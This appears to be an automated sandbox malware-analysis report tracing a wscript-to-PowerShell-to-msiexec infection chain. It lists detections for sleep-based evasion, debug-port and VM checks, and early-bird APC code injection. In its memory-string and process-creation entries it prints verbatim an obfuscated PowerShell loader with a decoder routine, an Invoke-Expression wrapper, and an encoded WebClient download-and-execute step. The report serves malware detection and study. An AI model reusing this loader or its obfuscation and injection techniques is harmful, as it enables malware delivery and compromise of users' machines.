              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5707Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6783Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3050Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 8084Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1120Thread sleep count: 3985 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1120Thread sleep time: -11955000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1120Thread sleep count: 5428 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1120Thread sleep time: -16284000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wscript.exe, 00000002.00000003.1300081099.000001C352072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000002.00000003.1300887888.000001C353F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: wscript.exe, 00000002.00000003.1286738829.000001C35205E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1299751234.000001C353FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1283744742.000001C353FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301884646.000001C352086000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1286961457.000001C353FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1300303733.000001C353FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1302102291.000001C353FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1300081099.000001C352085000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1287735795.000001C352086000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1299614264.000001C352082000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1449131027.000001B5ECD00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000002.00000003.1300887888.000001C353F72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1302102291.000001C353F72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301163298.000001C353F72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ce for the Hyper-V hypervisor to provide per-partition perfoB
              Source: wscript.exe, 00000002.00000003.1300887888.000001C353F72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1302102291.000001C353F72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301163298.000001C353F72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1003ce for the Hyper-V hypervisor to provide per-partition perfoB
              Source: wscript.exe, 00000002.00000003.1300303733.000001C353F77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: anebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT PoA PsgsysnBalA U tsa.EBe.ss.m=Tus(IgnT m e,rfs ReTKir- Cep CoaUniT amhYe O e$advtUseR InkB.ga orgEroeGo.RFols I,)Gr ');while (!$stagnates) {Halvraaddent (Fanebrere ' s $gragr.alFacoDuob .nasubl Po:PreFUdkaalgts,ahTake Peask rMact AmeK.ddAud=vi $Un.tBowrl,buAuteFe ') ;Halvraaddent $Ondskabsfuldhed29;Halvraaddent (Fanebrere 'F msUdsTVenAEftrVagT F -P hsPlolR,teD,sePoopKys H,n4Ild ');Halvraaddent (Fanebrere 'sal$salgG olAfdOIndbOpma onL F :Thes cat AvaTrigritn PraLarT CaE omsWax=R g(semTUnmeFogsBacTgum- Fop RyAs.ot,rohFib Lej$Y etVisR .ekHemA TeGFikeAntrMurs ll) F ') ;Halvraaddent (Fanebrere 'Pyt$ DagpanlsmiO.roBBe asilLsex:stirChru acs Kok WaiNarNAf,dAs.sRams.itKGusononE P,NParsnor=Afg$sapgobiL MiOAppBMina uLco.:DkkPHela P A adLPreg ndgChae,juTVinsDig+ n+ e%Caj$PatpRevyVinrskyHMerEC,tl KeI B OAntM Ble reTgodE FoRfaksPer.PluctotoKerU arnBest e ') ;$Ooziness=$Pyrheliometers[$Ruskindsskoens];}$Mategriffon=309679;$Tressen=28689;Halvraaddent (Fanebrere 'syd$st.GdialPhoo ambTomaKlaL Am:HetPUnaH ProsymNA sI TaCD bA ArlEpiLEn YAn Dog=.is Ubg Yae FotOph- B Cmoio crn rTIn ELednDyrT em Una$d.pTBr.rAnnk L AUnhgNoneMagrD ssHou ');Halvraaddent (Fanebrere 'Pen$UndgsuplPreoKo.bBeta M.lRes:st KKenosgsn Cas Ysi Cogslon ibe anrnoneBlodCroeOves K go=No, san[ ansselyF rsscltPaieTromEks.Go,CNato.uknprovskueWaxrDert ap]Pla:Eks:GadF ,ir jooCymmUndB PoasynsProeCem6Vol4C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0285D6E4 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,10_2_0285D6E4

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_5936.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6368, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4060000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;HalvraaddeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
